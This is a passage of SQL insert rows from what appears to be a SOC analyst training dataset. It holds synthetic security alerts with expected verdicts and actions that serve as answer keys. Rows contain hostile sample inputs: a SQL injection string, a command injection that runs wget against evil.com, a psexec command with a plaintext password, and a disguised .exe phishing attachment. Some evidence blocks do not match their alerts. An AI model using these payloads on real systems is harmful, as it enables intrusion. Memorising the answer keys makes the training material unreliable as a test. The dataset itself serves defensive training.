4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(627, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected containing a URL that redirects to a malicious site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"104.244.42.1\",\"email_sender\":\"phisher@maliciousdomain.com\",\"hostname\":\"mail.corp.com\",\"url\":\"http://maliciousdomain.com/login\"}', '2026-01-09 22:15:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL redirects to known phishing site\"}}],\"expected_actions\":[\"block_url\",\"educate_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that redirects to a malicious site, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.267Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(628, 'SQL Injection Attack Detected on Web Server', 'critical', 'Wazuh', 'A SQL injection attempt was detected targeting the corporate web server.', 'Web Attack', 'T1190', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.2\",\"dst_ip\":\"10.0.0.5\",\"hostname\":\"WEB-SERVER1\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 00:24:58', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a clear SQL injection payload, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(629, 'Suspicious Network Connection Detected', 'medium', 'Firewall', 'A network connection was made to an external IP known for suspicious activities.', 'Network Connection', 'T1041', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T13:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"185.143.223.42\",\"hostname\":\"CORP-WORKSTATION3\"}', '2026-01-11 09:40:55', '2026-03-10 22:24:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 100 times for suspicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"monitor_traffic\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for suspicious activities, warranting further investigation.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(630, 'Failed Login Attempts Detected on Internal System', 'low', 'Splunk', 'Multiple failed login attempts were detected from an internal IP address. The source does not show any malicious history.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"mwhite\",\"hostname\":\"CORP-SERVER1\",\"failed_attempts\":8}', '2026-01-10 12:00:04', '2026-02-16 16:56:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mwhite\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known internal user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed attempts were from an internal IP with no known malicious history.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:31:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:30:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:29:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:28:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(631, 'Email with Potentially Malicious Attachment', 'medium', 'Proofpoint', 'An email was detected with an attachment that could potentially be malicious. The attachment is not flagged by any antivirus engines.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T15:20:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.5\",\"email_sender\":\"unknown@unknown.com\",\"hostname\":\"mail.corp.com\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-01-09 16:19:52', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"unknown@unknown.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email from an unknown sender\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not detected as malicious by any antivirus engines\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The attachment is not flagged by any antivirus engines; hence it\'s considered a false positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Email with Potentially Malicious Attachment\",\"date\":\"2026-02-01T20:32:22.272Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(632, 'Unauthorized PSExec Execution Detected', 'high', 'Wazuh', 'An unauthorized execution of PSExec was detected on an internal server, indicating possible lateral movement.', 'Lateral Movement', 'T1569', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T16:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER2\",\"command_line\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\"}', '2026-01-10 16:40:16', '2026-02-16 17:31:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized use of PSExec tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized execution of PSExec indicates possible lateral movement, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(633, 'False Positive: Suspicious Domain Access', 'low', 'SIEM', 'Access to a domain flagged as suspicious, but further analysis shows no malicious activity.', 'Web Request', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T17:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"hostname\":\"CORP-WORKSTATION4\",\"domain\":\"safedomain.com\"}', '2026-01-11 09:50:46', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"safedomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Domain is clean and not associated with any known threats\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain access was incorrectly flagged as suspicious; no malicious activity was found.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.274Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T17:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION4\\\",\\\"domain\\\":\\\"safedomain.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(634, 'Command Injection Attempt Detected', 'critical', 'IDS', 'A command injection attempt was detected targeting a web application.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T18:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.10\",\"hostname\":\"WEB-APP1\",\"request_body\":\"id; wget http://evil.com/malware.sh\"}', '2026-01-11 00:35:15', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple command injection attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id; wget http://evil.com/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a command injection payload, confirming this as a true positive.\"}', 'Novice', 'MAL', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.275Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T18:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"hostname\\\":\\\"WEB-APP1\\\",\\\"request_body\\\":\\\"id; wget http://evil.com/malware.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
